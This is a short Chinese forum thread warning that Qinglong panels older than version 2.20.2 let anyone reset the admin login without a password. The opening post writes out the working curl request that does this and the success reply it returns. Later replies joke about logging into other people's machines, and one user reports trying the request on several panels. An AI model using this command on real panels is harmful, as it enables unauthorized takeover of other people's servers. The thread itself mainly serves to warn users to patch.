青龙漏洞,无密码登录任意面板,赶快更新最新版。
<i class="pstatus"> 本帖最后由 mn001 于 2026-3-9 06:55 编辑 </i><br /><br />
只要不是最新版2.20.2,用户密码被任意修改。<br />
执行:curl -X PUT "http://IP:5700/open/user/init" -H "Content-Type: application/json" -d '{"username": "123", "password": "123"}'<br />
返回:<br />
{"code":200,"message":"更新成功"}<br />
<br />
我的刚发现被改了, 还被挂了个脚本 我暂时是不敢用了。 青龙漏洞,无密码登录任意面板,<strike>赶快更新最新版</strike>。<br />
青龙漏洞,无密码登录任意面板,赶快登录别人的机器。 <div class="quote"><blockquote><font size="2"><a href="https://hostloc.com/forum.php?mod=redirect&goto=findpost&pid=16664847&ptid=1464668" target="_blank"><font color="#999999">HOH 发表于 2026-3-8 22:38</font></a></font><br />
青龙漏洞,无密码登录任意面板,<strike>赶快更新最新版</strike>。<br />
青龙漏洞,无密码登录任意面板,赶快登录别人的机 ...</blockquote></div><br />
理解能力超强 没暴露到外网,不用担心吧。 随便找了几个都报错 不敢用<img src="https://hostloc.com/static/image/smiley/default/cry.gif" smilieid="4" border="0" alt="" /> 还能用吗 <div class="quote"><blockquote><font size="2"><a href="https://hostloc.com/forum.php?mod=redirect&goto=findpost&pid=16664932&ptid=1464668" target="_blank"><font color="#999999">SpaceX 发表于 2026-3-9 08:44</font></a></font><br />
随便找了几个都报错</blockquote></div><br />
上周开始的。大半暴露在公网的应该都已经发现了异常,然后更新了。只有个别不上心的人没更新。比如我有一台平常不咋用的就昨天刚更新。
页:
[1]